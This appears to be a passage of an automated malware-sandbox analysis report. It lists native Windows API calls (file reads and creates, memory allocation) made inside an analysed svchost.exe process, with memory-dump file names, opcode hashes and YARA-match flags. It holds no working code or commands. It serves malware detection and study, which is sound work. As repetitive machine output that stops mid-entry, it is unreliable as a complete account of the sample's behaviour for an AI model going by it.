                                                      • Kernel-MUI-Language-SKU, xrefs: 00A989FC
                                                      • Kernel-MUI-Language-Allowed, xrefs: 00A98827
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00A98914
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: _wcspbrk
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 402402107-258546922
                                                      • Opcode ID: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                      • Instruction ID: cc9c08e51eaef2e9edfab93a9b0e80f7bf7f0d6c999efbb6c97ac7f7e2a2df57
                                                      • Opcode Fuzzy Hash: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                      • Instruction Fuzzy Hash: FBF1D6B2E00249EFCF11EF95CA819EEB7F9FF09300F15846AE505A7211EB359A45DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A953A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD22F4
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 00AD230B
                                                      • RTL: Re-Waiting, xrefs: 00AD2328
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD22FC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-871070163
                                                      • Opcode ID: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                      • Instruction ID: cd9ccc99a3cf90f74e2ff6bb3b61c0381724d4bc931ada5cbeb2ee8193e732a4
                                                      • Opcode Fuzzy Hash: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                      • Instruction Fuzzy Hash: 9051D4727006056BDF119B38DD92FA773E8AF58360F11462AF919DF282EA61E941C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: svchost.exe PID: 1832 Parent PID: 1580 svchost.exeCOMMON

                                                      Executed Functions

                                                      Function 0009A3A3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 0009A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: I$!J
                                                      • API String ID: 2738559852-2043589232
                                                      • Opcode ID: 0c42c13b0d30bec340ab9e7d3b793ddad00d205d196a334d27e0ee5a119e8f35
                                                      • Instruction ID: b9bc330e83284a35877d70dfb1b332a6ce20281cb8afe162fa4635cd948deca2
                                                      • Opcode Fuzzy Hash: 0c42c13b0d30bec340ab9e7d3b793ddad00d205d196a334d27e0ee5a119e8f35
                                                      • Instruction Fuzzy Hash: 2921F4B2200108AFCB18DF98CC91EEB77A9EF8C714F158659FA1D97241D630E811CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A34A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A39D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 7639d34905a880919c5717400ba9d1a23f9cdee49e0db110b2f8700603edcf6c
                                                      • Instruction ID: 9d8fd0123baed09107d81d2f1a94bc50ec1af930ac7a98cc426dc52591b0c8b0
                                                      • Opcode Fuzzy Hash: 7639d34905a880919c5717400ba9d1a23f9cdee49e0db110b2f8700603edcf6c
                                                      • Instruction Fuzzy Hash: 3301AFB2200108AFCB48CF98DC95EEB77A9AF8C354F158258BA1DA7251C630EC11CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A39D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: b2f30166a0ea9c2812d525be3896dff0cdd9b87133ac1ae8dcbaad5f83b7459b
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: AFF0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A400, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 0009A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !J
                                                      • API String ID: 2738559852-3045386990
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: 0c01db60cb18458f44a6e92dec687427c161acc2fc1cb65d4a93e96b9d8a1eb2
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 61F0B7B2200208AFCB14DF89DC91EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A47A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(@M,?,?,00094D40,00000000,FFFFFFFF), ref: 0009A4A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: @M
                                                      • API String ID: 3535843008-3016809790
                                                      • Opcode ID: 6b198ff5511d69b2156931a64a65d778fc3414db9c77d2ad78d57e9c78b4f095
                                                      • Instruction ID: 95463542fea6efc102be8c2d9a60d1afa56497ae96823d95a0597b3a89949b1b
                                                      • Opcode Fuzzy Hash: 6b198ff5511d69b2156931a64a65d778fc3414db9c77d2ad78d57e9c78b4f095
                                                      • Instruction Fuzzy Hash: B5E0C2762002007BD710EFE8CC85FE77B68EF48760F004599BA1DAB243C570E6008BD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A480, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(@M,?,?,00094D40,00000000,FFFFFFFF), ref: 0009A4A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: @M
                                                      • API String ID: 3535843008-3016809790
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: 4b826569fffc9e6a1bc1f8ba1a64fbe4ad69566cf241ab602223d2559a97c6cc
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: 04D01776600214ABDB10EBD8CC85EE77BACEF49760F1544A9BA1C9B242C530FA0086E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A52B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A569
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: bb2e6346b41dc8d2112341287c61dc1faf46383f59a4ff2fff07a94cc2967641
                                                      • Instruction ID: 23390c733118fa78f5dafb5c8a1c2f43ae39f64093d519681148c8bc55a69934
                                                      • Opcode Fuzzy Hash: bb2e6346b41dc8d2112341287c61dc1faf46383f59a4ff2fff07a94cc2967641
                                                      • Instruction Fuzzy Hash: 02F0F8B2200209AFCB14DF88DC91EE777A9EF88354F118159FA1D97251D630E811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A530, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A569
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 6d887bada648b37887bbceb32a581b8a2238a1c0f97e1436c59dffafeed43931
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: 26F015B2200208AFCB14DF89CC81EEB77ADAF88754F118158BE1C97241C630F810CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A000C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A007AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
